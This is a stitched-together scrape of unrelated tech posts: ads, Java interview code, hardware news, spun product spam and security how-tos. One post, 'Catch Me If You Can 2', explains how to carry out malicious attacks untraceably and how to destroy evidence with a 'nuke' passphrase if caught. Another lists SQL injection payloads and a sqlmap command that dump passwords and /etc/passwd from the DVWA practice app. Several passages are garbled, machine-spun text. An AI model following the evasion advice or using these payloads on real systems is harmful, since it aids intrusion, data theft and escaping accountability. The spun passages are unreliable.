Why Data Destruction Is Needed

By Dale Peck

Data destruction Austin can be a very critical service for some business owners. Before, there are a few number of computer operators that are sophisticated enough to restore some data that have been deleted in a drive. Today, retrieving these data is easier and quickly. This can practically suggest that anyone can retrieve the files that they have from a machine and other storage devices.

Emptying the recycle bin will not be good enough since there are many free tools that are available for retrieving the deleted files. Anyone can even use this successfully. However, the risks of identity theft and corporate espionage have greatly increased.

To answer all of these problems, there are some legal codes or regulations that have been developed to be followed by large companies. There are some employees that are hired to track these regulations that govern some records that are intended for retention or destruction. Yet, they found out that it is very difficult to train these employees.

There are different levels of protection that any company could select when they like to eliminate some of their files. By calling different professionals, they would come to them immediately. Through this, the entire process of getting rid of sensitive information permanently has been made simple yet affordable.

The price that must be paid for these services will be so small compared to having the certain job performed by themselves. If possible, the whole process of clearing out any storage device would ensure that any information could not be reconstructed anymore by using different software recovery utilities. This would make it very impossible for some inexperienced users to retrieve any data as well.

Sanitizing the equipment will make it impossible to obtain the archive. This entire process is often deployed whenever a device retires or must be disposed of. This will ensure that there will be no traces of business details that will be left behind it. With this, your information will not be released to some competitors especially when you are dealing with patient details and some records of client tax.

Overwriting your files can be another way to remove the device when it will be reused. There are ones or zeros that would usually take up much of the volume space. Through this, no one could retrieve a single file if the disk would be used again. The physical destruction could even render any device to be definitely unusable. This can be done by simply shredding a certain media into small pieces.

Overwriting can be best for the users who like to reuse some storage drives. This could allow them to stop some sensitive information such as pass codes, social security numbers and some account numbers to be recovered. There are standards that will be best in overwriting that goes forward and backward in different devices until it would be totally useless.

A certain qualified data destruction Austin can always advise various techniques that would be perfect for many businesses. Still, they need to be wise to verify all files that need to be properly kept. This may even play an important role in several ways because this may deal with the right handling of different information that are of relevance. With this, it is necessary to carry out a secure destruction of information.

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Java coding interview questions and answers

These Java coding questions and answers are extracted from the book " Core Java Career Essentials. Good interviewers are more interested in your ability to code rather than knowing the flavor of the month framework.

Q. Can you write an algorithm to swap two variables?

package algorithms;

public class Swap {

public static void main(String[ ] args) {
int x = 5;
int y = 6;

//store x in a temp variable
int temp = x;
x = y;
y = temp;

System.out.println("x=" + x + ",y=" + y);

Q. Can you write  code to bubble sort { 30, 12, 18, 0, -5, 72, 424 }?

package algorithms;
import java.util.Arrays;

public class BubbleSort {

public static void main(String[ ] args) {
Integer[ ] values = { 30, 12, 18, 0, -5, 72, 424 };
int size = values.length;
System.out.println("Before:" + Arrays.deepToString(values));

for (int pass = 0; pass < size - 1; pass++) {
for (int i = 0; i < size - pass - 1; i++) {
// swap if i > i+1
if (values[i] > values[i + 1])
swap(values, i, i + 1);

System.out.println("After:" + Arrays.deepToString(values));

private static void swap(Integer[ ] array, int i, int j) {
int temp = array[i];
array[i] = array[j];
array[j] = temp;

Q. Is there a more efficient sorting algorithm?
A. Although bubble-sort is one of the simplest sorting algorithms, its also one of the slowest. It has the O(n^2) time complexity. Faster algorithms include quick-sort and heap-sort. The Arrays.sort( ) method uses the quick-sort algorithm, which on average has O(n * log n) but can go up to O(n^2) in a worst case scenario, and this happens especially with already sorted sequences.

Q. Write a program that will return whichever value is nearest to the value of 100 from two given int numbers?
A. You can firstly write the pseudo code as follows:

  • Compute the difference to 100.
  • Find out the absolute difference as negative numbers are valid.
  • Compare the differences to find out the nearest number to 100.
  • Write test cases for +ve, -ve, equal to, > than and < than values.
package chapter2.com;

public class CloseTo100 {

public static int calculate(int input1, int input2) {

//compute the difference. Negative values are allowed as well

int iput1Diff = Math.abs(100 - input1);

int iput2Diff = Math.abs(100 - input2);

//compare the difference

if (iput1Diff < iput2Diff) return input1;
else if (iput2Diff < iput1Diff) return input2;
else return input1; //if tie, just return one

public static void main(String[ ] args) {
//+ve numbers
System.out.println("+ve numbers=" + calculate(50,90));

//-ve numbers
System.out.println("-ve numbers=" + calculate(-50,-90));

//equal numbers
System.out.println("equal numbers=" + calculate(50,50));

//greater than 100
System.out.println(">100 numbers=" + calculate(85,105));

System.out.println("<100 numbers=" + calculate(95,110));


+ve numbers=90
-ve numbers=-50
equal numbers=50
>100 numbers=105
<100 numbers=95

Q. Can you write a method that reverses a given String?
public class ReverseString {

public static void main(String[ ] args) {

System.out.println(reverse("big brown fox"));



public static String reverse(String input) {

if(input == null || input.length( ) == 0){

return input;


return new StringBuilder(input).reverse( ).toString( );



It is always a best practice to reuse the API methods as shown above with the StringBuilder(input).reverse( ) method as it is fast, efficient (uses bitwise operations) and knows how to handle Unicode surrogate pairs, which most other solutions ignore. The above code handles null and empty strings, and a StringBuilder is used as opposed to a thread-safe StringBuffer, as the StringBuilder is locally defined, and local variables are implicitly thread-safe.

Some interviewers might probe you to write other lesser elegant code using either recursion or iterative swapping. Some developers find it very difficult to handle recursion, especially to work out the termination condition. All recursive methods need to have a condition to terminate the recursion.

public class ReverseString2 {

public String reverse(String str) {
// exit or termination condition
if ((null == str) || (str.length( ) <= 1)) {
return str;

// put the first character (i.e. charAt(0)) to the end. String indices are 0 based.
// and recurse with 2nd character (i.e. substring(1)) onwards
return reverse(str.substring(1)) + str.charAt(0);

There are other solutions like
public class ReverseString3 {

public String reverse(String str) {
// validate
if ((null == str) || (str.length( ) <= 1)) {
return str;

char[ ] chars = str.toCharArray( );
int rhsIdx = chars.length - 1;

//iteratively swap until exit condition lhsIdx < rhsIdx is reached
for (int lhsIdx = 0; lhsIdx < rhsIdx; lhsIdx++) {
char temp = chars[lhsIdx];
chars[lhsIdx] = chars[rhsIdx];
chars[rhsIdx--] = temp;

return new String(chars);

public class ReverseString4 {

public String reverse(String str) {
// validate
if ((null == str) || (str.length( ) <= 1)) {
return str;

char[ ] chars = str.toCharArray( );
int length = chars.length;
int last = length - 1;

//iteratively swap until reached the middle
for (int i = 0; i < length/2; i++) {
char temp = chars[i];
chars[i] = chars[last - i];
chars[last - i] = temp;

return new String(chars);

public static void main(String[] args) {
String result = new ReverseString4().reverse("Madam, Im Adam");

Relevant must get it right coding questions and answers

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Operating Your Software Download Website Successfully Via Sound Strategy

By Benny Roye

If you arent bringing in the sort of traffic to your site that you want, its time to improve your web presence. See, the work isnt done once youve built and launched the site. Now you need to ensure that people know about you. Keep reading and let us teach you all about smart online marketing and SEO tactics that will get you noticed and bring in the traffic.

Not every visitor on your site will have access to the latest and greatest technology, so ensure that your content is also easy to view for those with older technology or slow internet speeds. You want as many people as possible to be able to efficiently navigate your site.

With your readers permission, get their e-mail addresses. Set up a double opt-in with them. Circulate a newsletter, once they have opted in. Dont make it too long, just make it short, simple, and funny so they will keep checking your download website.

Launch a review contest! Let your readers know that youre awarding a prize to a download website owner that writes the best review of your site. The links youll get will provide you with good juice for search engines and new visitors. Just make sure the prize is worth is, or no one will be motivated to participate.

404 error pages are a reality for every webmaster, so customize yours by including a couple useful links to keep them navigating your site instead of moving on to another. Even if all of your links are perfect, a misspelled search is all it takes to reach the dreaded 404 page.

Write your download websites copy based on what is in your service or product for your customer. Knowing whats in it for them when they buy your product or use your services brings more customers to your site.

The ability to search images with Google is popular. Software Download Websites images that are related to the keyword are brought up in the search results. This opportunity is lost if webmasters forget about the existence of this feature. Put a ALT and TITLE with the image tags when you add pictures. The changes of your download website getting more traffic from searches engines increases.

When you are running a successful download website, you have to keep in mind that your color scheme is very important. Your color scheme should complement your logo and the images used on the website. Make sure that the colors used balanced appropriately against other elements on the site. You want it to look organized and professional for your visitors.

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AMD Launches Phenom II CPU

Phenom II CPUAMDs first Quad Core 45nm CPU chip is finally out the doors and its being called the Phenom II. AMD has positioned the Phenom II CPU in between Intels Core 2 Quad and Core i7 and is being sold in two versions, the 2.8GHz X4 920 ($235) and the 3.0GHz X4 940 Black Edition ($275). Each Phenom CPU has an L3 cache size of 8MB but still trails in performance when compared to the 12MB L3 cache of the Intel Core i7s. However, what truly makes this chip stand out is that the Black Editions overclocking capabilities. Overclocking enthusiasts using liquid nitrogen have managed to bring the Phenom clock speeds over 6GHz surpassing the world record for Intel Core i7 processors, which stands at 5.5 GHz.
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Are iPad Users Snobs

Are iPad Users Snobs

This probably doesnt come as a surprise to many people but iPad users are "selfish elites." At least, thats what a new study says. The research comes from MyType, a consumer research firm. They surveyed 20,000 people between March and May to get a "psychological profile" of iPad owners. The result? "Selfish elites."

MyType found that iPad owners tend to be up to six times more "wealthy, sophisticated, highly educated, and disproportionately interested in business and finance" compared to non-owners. iPad owners also tend to be less than kind or altruistic. For the most part, they fell into the 30-50 age range.

However, a whopping 96% of those likely to criticize iPads dont even own the device. Those people have been deemed "independent geeks" by the company. MyTypes Tim Koelkebeck said in an interview with Wired.com that this group earned its name by being "self-directed young people who look down on conformity and are interested in video games, computers, electronics, science and the internet."

MyType lists a number of reasons as to why the iPad owners could be, well, the way they are. Speculation includes the high price tag of the device and the desire to have more gadgets on which to do more work for the workaholic types. As a matter of fact, when the iPad was released, there seemed to be mixed opinions amongst the people who wondered why the device was even necessary versus the people who saw it as a cool new way to stay connected.

As for the "independent geeks" or critics of the device, speculation suggests they are one trip to the Apple Store away from praising the iPad. Koelkebeck says that bashing it is an "identity statement." He goes on to say of the critics, "As a mainstream, closed-platform device whose major claim to fame is ease of use and sex appeal, the iPad is everything that they are not."

Thats pretty harsh, but anyone who knows anything about computers, the tech world, or modern pop culture knows that hating Apple products is simply a way of life for some people. However, there are also those people out there who would probably buy Apple garbage bags if they were to go on sale at the Apple Store.

Just how scientific is this research? Well, obviously, calling someone a "selfish elite" or an "independent geek" is pretty subjective. However, MyType did make a serious effort to get the American publics opinion of the iPad. You can read more about how they conducted their research and the reasoning behind it at MyType.com/blog.

If youre on the fence about the iPad and would like to take one for a test drive, check out temporary iPad Rentals.

Looking for Computer / PC Rental information? Visit the www.rentacomputer.com PC Rental page for your short term business PC needs. Or see this link for a complete line of Personal Computer Rentals.

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Tips To Help You Find The Right Computer Repair Plantation Fl Company

By Gwen Lowe

When your PC breaks, and you do not feel comfortable trying to figure out what the problem is and try to fix, you need to find someone look at it. It is however recommended that you call the manufacturer of the computer in case you are having any problems and you are under warranty. This is the cheapest, and typically free option. However, if you are out of warranty, the other option is getting help from a technician. You have many options when it comes to this because there are many experts to choose from. This however does not mean that you settle on the first computer repair plantation FL company you find.

There are different things one should bear in mind before choosing a computer expert. One can pick a local shop for these services. Here he can visit a few providers in town and learn what they are offering. One could also talk to people he know such as friends for recommendations. It is best to check if anyone close has had a similar issue with and if it is the case find out how they went about finding an expert.

The internet can also be a good source when it comes to finding these experts. You can visit a few websites belonging to these providers and find out more about their services. You could also read reviews from past customers to know if they were happy with the services offered. This may however not be a reliable option since the shipping is usually expensive, there are no guarantees and the machine can be damaged.

After deciding how you want to have the PC repaired, ensure the technician you hire is experienced in the job. He should be familiar with the operating system of your computer, hardware as well as the software. Also, make sure that the expert is certified with your manufacturer and has the training required doing repairs.

The number of years a shop has been offering computer repair services is also worth checking. One should choose a technician who is polite and is willing to help. The best provider is one who explains clearly what he plans to do. One should ask if it is possible to stay and watch the repair process. This way, he can shun fees from services that were never done something that is very common in this field.

Before you settle on any shop, ensure the costs are competitive with other providers in the area. The repairs ought to be done in a timely manner. The expert should back-up your data prior to commencing on any work with software because this can cause data loss.

A physical business address would be good. Be extra cautious about handing your computer over to someone who cannot give a receipt with a substantial address on it. Check the address against things such as company website to ensure it actually exists and it relates to the business.

The best computer repair shop must also be covered. This way, if more damages are caused to the machine one can be guaranteed of getting compensation. A person who has a good history will be worth the time and money.

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HOWTO Troubleshooting CUDA on Pentoo 2013 0 RC1 1

As Pentoo 2013.0 RC1.1 is using hardened kernel, some application may not working properly. You may need to inspect and change the pax settings of the application in order to make it to work properly.

Use paxctl to inspect and change the pax settings.

paxctl -h

paxctl -v [application name]

Since the current Pentoo 2013.0 RC1.1 (as updated to April 29, 2013), the CUDA do not work properly by default. You are required to do something on it. This bug may be fixed in the next update or RC version.

First of all, make sure the libraries of CUDA are loading properly by making sure the following lines are at the file /etc/env.d/99cuda :

cat /etc/env.d/99cuda




Finally, make sure some of the applications are set to proper pax settings. For example, cudaHashcat-plus64.bin and Cryptohaze-Multiforcer which are running with CUDA but they are not setting with pax flags properly at the current version.

Make sure the pax settings should be shown as the following :

Known Issue

The current version/update as on April 29, 2013, the pyrit does not work properly with CUDA. Since pyrit is written in Python, the paxctl does not work at all. According to one of the developers, the pyrit will be removed from the distribution.

Thats all! See you.

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RECHARGEABLE NEUTRAL PORTABLE BUILT IN SUITABLE is one of the bestseller product in the market today. People arround United Kingdom is looking for RECHARGEABLE NEUTRAL PORTABLE BUILT IN SUITABLE with low prices from Internet. If youre lucky you can get a special discount from Amazon, only in this month. Well, good product that comes with low prices is everyone choices.

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Microsoft Encouraging More Tablets

Microsoft Encouraging More Tablets

Several hardware makers are teaming up with Microsoft, in an attempt to give Apple a run for its money. Theyre looking to release a number of Windows-based tablet computers that can compete with Apples iPad. At least 21 manufacturers were mentioned, including Fujitsu, Hewlett-Packard, Dell, Asus, Toshiba, Sony, Lenovo, and Panasonic.

The news was announced by Microsoft CEO Steve Ballmer on Monday, July 12, at the Microsoft Worldwide Partner Conference, "This year one of the most important things that we will do in the smart device category is really push forward with Windows 7-based slates and Windows 7 phones. Over the course of the next several months, you will see a range of Windows 7-based slates that I think youll find quite impressive. This is a terribly important area for us. We are hardcore about this."

He added, "Theyll come with keyboards, theyll come without keyboards, theyll be dockable, therell be many form factors, many price points, many sizes, but they will all run Windows 7. They will run Windows 7 applications. They will run Office."

Ballmer did admit Microsoft failed with Windows Mobile and is unable to compete with iPhone, Droids, and Blackberrys. On the other hand, he says Windows Phone 7 has received, "great reviews, really quite remarkable reviews." The companys mobile phone partners were listed to include Samsung, Dell, Asus, Toshiba, Garmin, Sony Ericsson, and HTC.

Ballmer also talked at length about cloud computing - Windows Azure - and its "new opportunity." He says cloud enables Microsoft to help customers "streamline their operations and improve their agility." Ballmer also says, "The world of tomorrow is a world of a smart cloud talking to smart devices roam your information across the internet. We are at an inflection point in technology history...for customers, cloud computing creates tremendous value, which translates to massive opportunity for Microsoft and its partners."

According to Microsoft, eBay, Fujitsu, Dell, and HP will be using Windows Azure appliances. Dell says the platform will be useful for delivering cloud services to small and medium-sized businesses.

Other news from Microsoft included news that theyve sold 150 million licenses for Windows 7 since its launch in October, 2009.

Looking for Computer / PC Rental information? Visit the www.rentacomputer.com PC Rental page for your short term business PC needs. Or see this link for a complete line of Personal Computer Rentals.

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Computer Components System Drivers Explained

By Dean Miller

Some sort of Windows system can be a classified assortment of component elements from a few manufacturers. These components or devices will need to communicate amongst each other and using Windows PC. The utility links concerning components usually are through wiring and electric circuits in the motherboard, nonetheless link to Operating systems is mastered by something called some sort of software taxi driver or, to bring up it 100 % a device driver, termed by microsoft.

Device driver can be a ingenious innovation that funds Microsoft to maintain its Eye-port systems up-to-date. It additionally allows manufacturing businesses producing new computer hardware parts independently. Imagine that one of many superior tone card construction businesses produces an alternative model which is not accepted by several existing designs of operating systems.Just check out for your 5GB WORM MAGNETO OPTICAL .

If Windows were an inflexible main system, the company would not be permitted to sell the card till it had persuaded Ms to revise the operating system to support it, and after this they are able to only put up for sale it to those with the modern version of operating system.Just check out for your Server Raid 4M Battery .

This is a little, renewable portion of software that communications information the transmission between your personal computer hardware part and Windows main system. The product driver is likely to tell Windows what are you doing, Windows main system doesnt care that the component is doing. A large number of device owners are resulted in Windows main system covering almost all the common hardware devices from senior companies. If a business produces a new component or makes modifications and betterments to an existing item, a brand-new driver is added to substitute the sole built right into Windows computer.

Device Drivers used to be issued with diskettes but lately theyre usually on DVD media. As soon as you buy some sort of ready-to-run personal computer, the PC maker pre-installs Windows and whole with the required unit drivers, nevertheless, you may nevertheless need the unit drivers in case Windows becomes unstable. These may very well be supplied on a few CD-ROMs, but from time to time the computer manufacturer amasses these onto only one CD for a convenience, and for everybody who is really successful therell be described as a menu and additionally help system that will help you set in place them.

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Personal pc Discount Wyse V30LE Thin Client C7 Eden 1 20 GHz

Inexpensive Wyse V30LE Thin Client - C7 Eden 1.20 GHz Motivate it These days

Evaluations: Wyse V30LE Thin Client - C7 Eden 1.20 GHz

Wyse V30LE Thin Client - C7 Eden 1.20 GHz

Wyse V30LE Thin Client - C7 Eden 1.20 GHz Understand it Now

Reflecting the needs of ever changing desktop environments the Wyse V30LE Thin Client has the expandability, power and performance to match. It presents an all-round high performance and versatile desktop computing platform. Wyse V30LE Thin Client - VIA C7 Eden 1.20 GHz is one of many Thin Clients available through Office Depot. Made by Wyse.

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Personal pc Low cost Lenovo ThinkCentre M72e 0967B4U Desktop Computer Small Form Factor

Low price Lenovo ThinkCentre M72e 0967B4U Desktop Computer - Small Form Factor Browse Nowadays

Scores: Lenovo ThinkCentre M72e 0967B4U Desktop Computer - Small Form Factor

Lenovo ThinkCentre M72e 0967B4U Desktop Computer - Small Form Factor

Lenovo ThinkCentre M72e 0967B4U Desktop Computer - Small Form Factor Browse Today

Presenting the Lenovo ThinkCentre M72e desktop designed for enterprise-class productivity, manageability, and reliability. This fully loaded desktop is available in tower, small form factor, and the new tiny form factor. Productivity is powered by the latest 3rd generation Intel Core processors with enhanced CPU and graphics performance. Lenovo Enhanced Experience with RapidBoot HDD Accelerator provides incomparable efficiency with quick start up on the latest Windows platform. Whether in a school or an office, the ThinkCentre M72e offers performance beyond expectations, quicker productivity, and legendary reliability.

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DESKTOP RECHARGEABLE PORTABLE BUILT IN SUITABLE is one of the bestseller product in the market today. People arround United Kingdom is looking for DESKTOP RECHARGEABLE PORTABLE BUILT IN SUITABLE with low prices from Internet. If youre lucky you can get a special discount from Amazon, only in this month. Well, good product that comes with low prices is everyone choices.

On sale now at cheap price, promo discounts and super shipping. Im really pleased with its qualities and highly recommend it to everyone hunting for a excellent item with the newest features at an reasonable. You can read review from buyers to find out more from their experience. DESKTOP RECHARGEABLE PORTABLE BUILT IN SUITABLE has worked beneficial for me and I believe it would do wonders on you too. Why then spend much more time? Enjoy yourself, you understand where to shop the best ones.

Most of the customer reviews speak that the DESKTOP RECHARGEABLE PORTABLE BUILT IN SUITABLE are splendid luggage. Also, It Is a pretty well product for the price. It’s great for colony on a tight budget. We’ve found pros and cons on this type of product. But overall, It’s a supreme product and we are well recommend it! When you however want to know more details on this product, so read the reports of those who have already used it.

DESKTOP RECHARGEABLE PORTABLE BUILT IN SUITABLE is a good choice with brand new features that will make you amaze. But if you still want to have another information about DESKTOP RECHARGEABLE PORTABLE BUILT IN SUITABLE, you can read more detail information, spesification, and reviews from people that bought DESKTOP RECHARGEABLE PORTABLE BUILT IN SUITABLE below.


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Home computer Very best at this point Lenovo ThinkCentre M78 2111C3U Desktop Computer Tower AMD A6 5400B

Most effective presently Lenovo ThinkCentre M78 2111C3U Desktop Computer - Tower, AMD A6-5400B price compare

Rankings: Lenovo ThinkCentre M78 2111C3U Desktop Computer - Tower, AMD A6-5400B

Lenovo ThinkCentre M78 2111C3U Desktop Computer - Tower, AMD A6-5400B

Lenovo ThinkCentre M78 2111C3U Desktop Computer - Tower, AMD A6-5400B price compare

A new era of performance and manageability ThinkCentre M Series continues to expand cost- and management-control capabilities; providing enterprise users and IT managers with smarter ways to be more productive. Our latest models offer improved overall system performance; optimized for the most demanding applications; from video editing to 2D/3D image design and more. Expanded power management compatibilities help you achieve new levels of energy efficiency; while Dual Independent Display (DID) support enables you to view up to four screens simultaneously. Lower costs while improving productivity across your enterprise.

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Corsair Introduces 64GB Portable USB Flash Drive

Corsair announced today that it is expanding its best selling Flash Voyager USB family lines with a new 64GB capacity offering. The new 64GB USB Flash Voyager has enough capacity for a library of DVD-length movies and tens of thousands of high-resolution digital images. Corsair 64GB USB Flash Voyager drives will be available immediately at a Manufacturer’s Suggested Retail Price of $249.99.

"Corsair is always developing new and exciting flash products, and the 64GB USB Flash Voyager is no exception," said John Beekley, Vice President of Applications at Corsair. "With more storage space than most laptops, we can offer a full suite of features – whether it be backing up data, building a portable media library, or simply transporting huge amounts of data." added Beekley.

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Oregon Scientific Music Sphere WRS368

Oregon Scientific Music Sphere WRS368

Oregon Scientific Music Sphere WRS368 is one of the bestseller product in the market today. People arround United Kingdom is looking for Oregon Scientific Music Sphere WRS368 with low prices from Internet. If youre lucky you can get a special discount from Amazon, only in this month. Well, good product that comes with low prices is everyone choices.

For sale now at cheap price, special discounts and easy shipping. I am extremely satisfied with its features and highly recommend it to all people wanting for a quality item with the newest features at an reasonable. You can read testimony from buyers to find out more from their experience. Oregon Scientific Music Sphere WRS368 has worked beneficial for me and I wish it would do wonders on you too. Why then waste much more time? Enjoy it, you know where to buy the best ones.

Some of the customer reviews speak that the Oregon Scientific Music Sphere WRS368 are splendid luggage. Also, It Is a pretty well product for the price. It’s great for colony on a tight budget. We’ve found pros and cons on this type of product. But overall, It’s a supreme product and we are well recommend it! When you however want to know more details on this product, so read the reports of those who have already used it.

Oregon Scientific Music Sphere WRS368 is a good choice with brand new features that will make you amaze. But if you still want to have another information about Oregon Scientific Music Sphere WRS368, you can read more detail information, spesification, and reviews from people that bought Oregon Scientific Music Sphere WRS368 below.

Oregon Scientific Music Sphere WRS368 Detail Information :

This Page is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.co.uk

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Catch Me If You Can 2

Last year, I was talking about how to use 3G/4G pre-paid SIM card to do malicious things. The full article is here. However, many countries required to register the buyers personal particulars when they purchase 3G/4G pre-paid SIM card. Today, I will introduce another method that you can use wired or mobile network to do malicious things untraceable.

First of all, you need a virtual machine (VMWare, VirtualBox or Parallels, etc) or a standalone computer. A router when you are connecting to the internet in wire. Otherwise, a pocket 3G/4G WiFi router is a must for mobile connection.

I prefer virtual machine if you have a suitable hardware (for example, more than 4GB RAM and a large hard drive or SSD).

Secondary, you need to install Ubuntu Server 12.04 LTS (x86 or x86_64) with openssh installed on the virtual machine (or a standalone computer if your prefer).

Thirdly, after installed Ubuntu server 12.04 LTS, you need to install NightHawk. Make sure your MAC address of the network interface (NIC) is changed or customized by macchanger. I recommended not to use the default MAC address even you are using virtual machine.

Fourthly, you connect to the virtual machine (NightHawk) with PPTP VPN and then you can do everything (including maliciously) untraceable. Make sure you change the DNS to others (not your real ISP) in your host computer (PPTP setting).

Finally, if you are using Kali Linux, you can install the VPN client as the following :

apt-get install network-manager-pptp-gnome network-manager-pptp

/etc/init.d/network-manager restart

For the setup of NightHawk, please refer to here.

Two things you should remember, one is to change the MAC address of the NIC at virtual machine; and the other is to change the DNS entries of PPTP configuration. By the way, do NOT use reverse connection or you need to use hidden services (I am not tried yet). Javascript and Flash should be disabled on browser too. Otherwise, you will be traced.

Final thought, after the successful and amazing malicious attack, you can securely and completely delete the virtual machine. In addition, you are recommended to fully encrypt your Kali Linux box and implement the self-destruction. Then, you can destroy your Kali Linux box with "nuke" passphrase in case you are being caught. Nice?

Thats all! See you.

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HOWTO Scapy 2 2 0 on Ubuntu 12 04 LTS

To install Scapy

sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot

To run Scapy interactively

sudo scapy

The scapy shell will be displayed :

WARNING: No route found for IPv6 destination :: (no default route?)

Welcome to Scapy (2.2.0)


To quit Scapy


Thats all! See you.
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Worlds cheapest Netbook

Netbooks Cheapest you can find today any hemisphere with an astonishing price tag, only $ 98.
Lanya, is the name of the company recently introduced a new netbook is priced very cheap. The company is based in Shenzhen China. Maybe for some people of course are very familiar with the name of the enterprise, but clearly they are the latest Netbook Netbook Netbook cheapest of the cheap line ever.

Simply for the curious as to what sepesifikasi of cheap netbooks called LY - EB01 this eBook.
First we will not find an Intel Atom processor as on most Netbooks, Netbooks using ARM processor is 266 MHz AK7802Q216.
To balance the ability of the processor, the screen certainly be made not too large. eBook LY- EB01 is framed with a screen 7- inch TFT LCD with 800 x 480 resolution.
Another specification is the use of 128 MB of RAM and Microsoft WinCE 5.0 operating system. For the affairs of the battery, this powerful 1800 mAh Notebook Li - Ion battery. And like the Netbook in general, LY- EB01 eBooks course also equipped with WiFi.
Although most likely is not very good performance, but at least overall quite worth the price is very cheap. You can still open the email or just surfing the internet. But on the other hand there is one advantage of this Netbook, namely the power that tends to be more efficient because its components are not consuming too much battery, so you can be much longer using this netbook with no electrical connection.
And what about the weight and size? It weighs only 0.6 kg with dimensions of 21.3 x 14.2 x 3 cm, fairly lightweight and easy to carry around.
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Security level = low

99 or 1=1

- will display all the records

99 or 1=1 union select 1,2,3

- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2

- no error message but display all records

99 or 1=1 union select null,null

- no error message but display all records

99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()


99 or 1=1 union select user(), null

- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=users

- will display the users table column list

99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- we are looking for users tables first_name and password

99 or 1=1 union select null,@@datadir

- will display the mysql directory

99 or 1=1 union all select null,load_file(/etc/passwd)

- will display the content of /etc/passwd

Security level = medium

99 or 1=1

- will display all the records

99 or 1=1 union select 1,2,3

- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2

- no error message but display all records

99 or 1=1 union select null,null

- no error message but display all records

99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()


99 or 1=1 union select user(), null

- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns

- since where clause cannot be used, all column name should be listed


99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273

- where 0x7573657273 is Hex value of "users"

99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- we are looking for users tables first_name and password

99 or 1=1 union select null,@@datadir

- will display the mysql directory

sqlmap for Security = low

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

For Security = medium is similar.

Thats all! See you!

Read More..

Browsers Browser Review

Dooble is Associate in Nursing intuitive applications programme that gives cross-platform practicality and solid performance. This program is meant to supply a convenient browsing expertise, accenting privacy. The browser are often used on a spread of platforms, as well as UNIX, Windows 7, Windows visual percept, Windows XP, and waterproof OS X. Its interface is extremely sleek and easy, that includes clearly tagged commands. All of its applications area unit open supply.

This free applications programme could not be easier to use. All youve got to try to to is to go to the developers web site and transfer the appliance. A compact and easy code base ensures that each users and developers have access to its internal functions. Dooble has over one hundred options, including:

• Associate in Nursing integrated file manager
• address history computer programme
• History sidebar
• JavaScript-free FTP browser
• Integrated Retro traveller
• intrinsical email shopper
• transfer traveller

• Integrated desktop
• straightforward installation
• simple interface
• increased privacy options
• Bookmarks
• totally customizable proxy configuration
• Cookie management
• on the market in over forty languages
• Plugins support

Users will import and export bookmarks. theyll additionally modify existing bookmarks via a popup window thats accessible from the placement gizmo. The browser features a colourful and distinctive desktop, that is another bonus. The intrinsical traveller permits users to speak with their friends in an exceedingly secure manner. youll be able to use the integrated file manager to open third-party applications from at intervals the browser. Uses also can customise each facet of the browser, from history preferences to show quality.

If the browser crashes, youll be able to quickly resume your browsing session. Dooble supports session restoration and encrypts all browsing knowledge mechanically. Associate in Nursing exception is user settings. net developers will simply extend or improve its practicality. The browser is supplied with a special mechanism that mechanically removes cookies. Most of the information thats generated for permanent storage is encrypted.

Dooble comes with several nice plugins for a superior browsing expertise. not like different browsers, JavaScript isnt needed for sorting parts within the FTP browser. Users have access to a file manager that permits them to form directories, rename entries, delete entries, and access files. Bookmarking could also be performed from completely different places, as well as the placement gizmo, history sidebar, and history panel.

Several net developers and trade consultants have rated Dooble because the ninth of ten prime UNIX browsers. If you would like to a basic browser that provides all of the options one would wish, Dooble could be a viable alternative. whereas its not the foremost developed browser out there, it delivers outstanding speeds and comes with advanced functions for pleasing browsing expertise.
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AutoCAD Bonus Tool MDITabs Works on AutoCAD 2011

The free MDITabs Bonus Tools from Autodesk , as reported by Shaan Hurley, Autodesk Blogger of Between The Lines, will work with AutoCAD 2011!  Ive used this tool in the past and just might download it again, now that it seems to work with 2011.

Go on over to his site to check it out and to download it.

Between The Lines

Thanks Shaan for trying it out for us.
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Quick Tip – Slow Printing

If you are using AutoCAD 2008 or even AutoCAD 2009, you might have noticed the printing seems to move a little bit slower. Here is a quick tip on speeding up your printing.

AutoCAD 2008 introduced to us BACKGROUND PROCESSING for plotting. The theory behind it is that it will free up your computer while printing so that you can continue to work. It sounds good. I like it when I am publishing something or batch plotting through the sheet set manager.

BUT (there’s always a but in there somewhere), when I need to print single sheets, I don’t like it so much. What often happens to me is that I have two to three drawing files open and I want to print them. They might be from different drawing sets or whatever. The point is that I can only print them from the DWG files, one at a time. The background processing printing won’t let me print the second file until the first one is finished. So what’s the big deal?

The problem is that when you print behind the scenes, it takes longer. It takes longer because the computer is processing the printing, and processing your work. So I tried it. I switched it off and WOW!! The old printing speed returned. I have kept it off and my printing is much faster.

I usually don’t encourage people to turn off new features, because I want all of us to give them a chance. But this one works better for me when it is off. Perhaps the speed is not an issue (and even for me it isn’t always an issue) for you, and that’s ok too.

To turn it off, open up the OPTIONS (type in OP at the command line). Go to the PLOT AND PUBLISH tab. Near the left center area there is the option to toggle on/off Background Plotting. You have the ability to turn off Plotting and/or Publishing. I left the publishing on but turned the plotting off. Set it to fit your needs.

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TuneUp Utilities 2013 Download

Is your PC not running as smoothly as it did when you first took it out of the box? A lethargic machine is oftentimes the result of a fragmented hard drive, an overabundance of junk files, and a Windows registry in disarray. If youd like to put some pep in the step of your sluggish desktop or laptop, then check out TuneUp Utilities 2013.

This application is designed to improve computer performance by tossing junk files, uninstalling unneeded programs, defragmenting the hard drive, and much, much more.
